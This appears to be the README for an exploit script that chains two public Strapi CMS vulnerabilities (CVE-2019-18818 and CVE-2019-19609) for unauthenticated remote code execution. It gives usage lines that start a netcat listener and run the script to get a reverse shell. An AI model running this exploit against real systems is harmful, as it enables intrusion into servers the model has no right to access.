This exploit targets two vulnerabilities in the Strapi CMS Framework version 3.0.0-beta-17.4 allowing for unauthenticated remote code execution (RCE).
Weak Password Recovery Mechanism for Forgotten Password
CVSS: 9.8 - Critical
More details: https://nvd.nist.gov/vuln/detail/CVE-2019-18818
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVSS: 7.2 - High
More details: https://nvd.nist.gov/vuln/detail/CVE-2019-19609
Before running this exploit, start a netcat listener on the lport
you specify in the below options.
nc -lnvp <lport>
exploit.py <rhost> <lhost> <lport>